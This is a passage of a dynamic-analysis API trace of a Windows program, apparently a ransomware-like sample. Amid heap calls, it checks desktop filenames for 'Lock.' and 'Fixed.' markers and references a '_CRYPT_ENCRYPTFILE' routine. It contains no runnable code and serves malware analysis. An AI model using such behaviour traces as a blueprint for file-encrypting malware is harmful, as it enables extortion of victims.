HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0140.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0140.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0140.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0140.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0140.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e563a8 [0140.637] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/cggtx8L.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif", lpFilePart=0x8cf650*="cggtx8L.gif") returned 0x23 [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0140.637] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cggtx8L.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\cggtx8l.gif")) returned 0xffffffff [0140.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0140.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0140.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.638] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0140.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0140.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0140.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSIs1Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SIs1Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Is1Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0140.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0140.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0140.641] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0140.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0140.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0140.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0140.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0140.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0140.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSIs1Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SIs1Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Is1Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0140.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9g.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0140.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0140.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0140.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0140.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0140.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0140.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0140.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0140.645] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0140.645] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0140.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0140.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0140.645] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0140.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0140.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0140.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0140.648] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0140.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0140.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0140.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0140.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0140.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0140.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0140.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0140.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0140.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0140.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0140.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0140.651] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0140.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0140.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0140.652] RtlAllocateHeap (HeapHandle=0x970000, 